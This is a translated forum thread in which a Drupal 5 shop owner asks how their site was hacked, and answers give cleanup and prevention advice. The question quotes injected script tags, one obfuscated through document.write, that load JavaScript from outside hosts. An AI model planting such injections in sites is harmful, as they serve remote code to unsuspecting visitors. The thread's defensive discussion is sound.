這是關於基於 Drupal 5 的線上商店。
突然就不行了。造訪網站後,出現以下錯誤:
解析錯誤:語法錯誤,/home/public_html/index.php 第 38 行出現意外的“<”
經過進一步檢查,我在上述index.php的末尾發現了以下兩行:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
手動刪除這兩行後,該網站似乎再次正常工作。
但在報告更多問題(編輯頁面)後,我發現實際上所有 *.js 檔案都被「感染」。它們都在末尾包含一個額外的行:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
這個網站被駭了嗎?在Google上搜尋「blog.nodisposable.com」時,沒有出現任何有趣的結果。該網站本身似乎是合法的。難不成是自己被黑了?
有人能解釋一下這是怎麼發生的嗎?我可以做什麼來扭轉這個局面?將來我可以做些什麼來避免這種情況?
更新
恢復網站(不是資料庫)的備份後,它再次發生,但現在腳本標記指向dolfy.sedonahyperbarics.com:8080/XHTML.js.
顯然,也創建了許多隨機的 Drupal 使用者帳戶。因此,這可能表明它實際上是一個 Drupal 漏洞。
我們刪除了它們,並將用戶帳戶建立限制為僅限管理員(我知道從一開始就應該如此:-s)。我們也更改了管理員用戶密碼更安全。
我們希望它現在不會回來。
答案1
如果它被駭客入侵,你不知道是否安裝了後門。
重新格式化後,您可能必須從已知良好的備份重新安裝。
永遠不要相信系統中有入侵者的系統。
為了防止將來發生這種情況,您必須跟上更新,並訂閱與您正在運行的軟體的漏洞和最佳實踐保持同步的列表(drupal 列表、您平台的安全列表等) ,以及僅向使用系統所所需的使用者鎖定服務,使用安全密碼,不以明文形式執行任何操作,以及安全最佳實踐下的其他所有內容,這些內容遠遠超出了此處答案的上下文。並保留良好的備份並安裝入侵偵測(例如類似 Tripwire 的系統)以檢查入侵者活動。
答案2
是的,我擔心你被感染了。不幸的是,如果不投入更多的時間和精力,就不可能說出「如何」。它可能是您的 Drupal 安裝(或其模組之一)中的漏洞,也可能是同一伺服器上另一個應用程式中的漏洞,也可能是弱(或被盜)的 FTP 密碼,等等。切入點。
答案3
我看到過一些非常相似(幾乎相同)但與 Drupal 無關的東西,這絕對是一個 hack。
正如其他人所說,如果沒有有關您環境的更多信息,就很難知道。要阻止它被提供服務,您可以快速執行的操作是在 .htaccess 檔案中新增指令,該指令將拒絕或重定向到該 .js 檔案的任何請求。
答案4
雖然完全基於我自己的經驗,但每次像這樣的黑客攻擊,尤其是重新感染,都是由於具有FTP 訪問伺服器權限的人的本地計算機被感染並且某些東西竊取了憑證- 您需要檢查FTP 日誌並確保您認為所有 IP 位址和更新都是有效的 - 如果某些內容重新感染,您應該很容易在那裡看到它(如果是這種情況)。